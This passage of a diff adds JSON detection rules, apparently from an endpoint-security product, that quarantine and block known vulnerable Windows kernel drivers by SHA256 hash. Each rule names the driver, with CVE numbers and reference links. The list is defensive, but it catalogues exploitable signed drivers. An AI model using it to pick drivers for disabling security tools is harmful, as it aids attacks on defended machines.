+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145172Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de7cbbcb95e3079eb3b7afc47410796ef072218ad844e00f154594d0bc9064e4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad846fc2-ae2d-5079-bb3f-848ec8817bc5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974836Z",
+ "creation_date": "2026-03-23T11:45:29.974837Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974843Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44120b712e4b5ef3b302f03b7aa61f9f6fe6820d966addbcc43d8e09402e5906",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad8995f3-7069-5e4f-8a20-32bdb162412f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491831Z",
+ "creation_date": "2026-03-23T11:45:31.491833Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491839Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff2e6875b1946c037a15d4194e7c4e5551576236577b336997e590244141ff54",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad8e4eb7-a4aa-5402-a1e2-8fa34145a1da",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829027Z",
+ "creation_date": "2026-03-23T11:45:30.829029Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829034Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f73a08257789f98459f92c48c8dca7bd1616fb568823f230f17d559c27aee22",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad8ee40f-268c-5b96-9c9d-2a2fd17d7e65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621176Z",
+ "creation_date": "2026-03-23T11:45:29.621177Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621183Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c55b6620216c195ce24ef21e6ab7e181146fccf17c06606c4cd419fe3e45bd7",
+ "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad9142dd-5509-5c3d-857d-fb1db26fd67b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457245Z",
+ "creation_date": "2026-03-23T11:45:30.457248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457257Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "198a4dc1c4bd7eff31ff4d1952a592170b25bfb5fedcd9d5d4c4fd3707337e42",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ada923e8-238a-54d0-bec6-ce48fff76c39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973620Z",
+ "creation_date": "2026-03-23T11:45:29.973621Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973627Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bc0921ffd4acc865525d3faf98961e8decc5aec4974552cbbf2ae8d5a569de4",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "adb46306-ea15-5618-b8d6-56f05297f3d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821236Z",
+ "creation_date": "2026-03-23T11:45:31.821239Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821247Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f44b9c956a98d453454f79d91dbb4e8768d5b671e4a413609e2cd866778d872",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "adc71f6d-2bf8-54d6-bd6b-0adab8d56586",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973982Z",
+ "creation_date": "2026-03-23T11:45:29.973984Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973990Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9014b03866bf37faa8fdb16b6af7cfec976aaef179fd5797d0c0bf8079d3a8c",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "adc740ca-4e15-5afe-88c0-66643cbde6ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618305Z",
+ "creation_date": "2026-03-23T11:45:29.618307Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618312Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df996d5a06a2e2ecc087569358b1957d500b176ec7ed37031bcee440963d9d80",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "adcfe4ca-e716-5ffb-91b4-a3b651fb7a61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810558Z",
+ "creation_date": "2026-03-23T11:45:31.810560Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810565Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a1150b251622c9ae01cb7c1939f77de16a2543b37d3cb46271f3aadc314310f5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "addbaf10-deb3-55b8-b25b-3671ee03fd11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833534Z",
+ "creation_date": "2026-03-23T11:45:30.833537Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833546Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22e67a311baf7084390e9a1b32259f687b83cae75d6632be82ed8bf77a4facfe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ade3e6ff-48cc-5ab3-a065-f8da63c5eedf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817742Z",
+ "creation_date": "2026-03-23T11:45:30.817745Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817753Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c62a659a4f8fdecfd5a64f4f4391852996db564d123fc5d20e3f3dfb11ed62c",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "adedd4e1-a3ab-591a-ade1-5844e56399a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456076Z",
+ "creation_date": "2026-03-23T11:45:30.456079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456088Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13d7c729c019c1c5a4b3e9fb27d1dd0b992fb7099f4314e011aafcb3472b7107",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "adfd0926-734c-5530-adc3-a93f0d39203c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145817Z",
+ "creation_date": "2026-03-23T11:45:31.145819Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145825Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "53ff5a5d249b46963193ad6ace0ad2eed3015f75c21f336a9356587a24626039",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae04f8e0-70d0-557b-8c0b-82a6429b5728",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454036Z",
+ "creation_date": "2026-03-23T11:45:30.454039Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454048Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0eab16c7f54b61620277977f8c332737081a46bc6bbde50742b6904bdd54f502",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae12a09f-49b3-5257-af6a-3cf87530f738",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829202Z",
+ "creation_date": "2026-03-23T11:45:30.829204Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829209Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "341112cb43a877160f2c2b49c815e00d2069dbd3d7151660c1bd7aa0a48798de",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae1fcc51-187e-5984-8bdb-f96e64c33ed9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817304Z",
+ "creation_date": "2026-03-23T11:45:31.817306Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817311Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7fd5ee391257e27e9f62cba119818229e873fe4ac1ff3d8ce58ceb461cd3679",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae29637f-c982-56f5-844e-863e2ccfa65a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835910Z",
+ "creation_date": "2026-03-23T11:45:30.835912Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835918Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d60c23bb3d66311291cf83fd65a368d7633138123d3128e5c7102f5dbc810603",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae2e71ba-7048-5943-94ab-52026fb9fcd8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477290Z",
+ "creation_date": "2026-03-23T11:45:30.477293Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477302Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0dc4ff96d7e7db696e0391c5a1dda92a0b0aedbf1b0535bf5d62ebeec5b2311c",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae34fd73-6596-5769-9458-9605fa08ca8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825132Z",
+ "creation_date": "2026-03-23T11:45:30.825136Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825146Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "453ebab8125afc45e99d961bdd0471e6ac75d17636d8a07f5b1ec50a2e6c7ee7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae3cf975-c2ac-58b3-a54a-9a37ac42cf65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608631Z",
+ "creation_date": "2026-03-23T11:45:29.608633Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c5bd7563d8f97c73577cc0e90b5f7b7764940250067bf4cf6e739d27ffd26a5b",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae47271a-4399-5cd6-98cb-b9b7f4d4d151",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141121Z",
+ "creation_date": "2026-03-23T11:45:31.141123Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141129Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
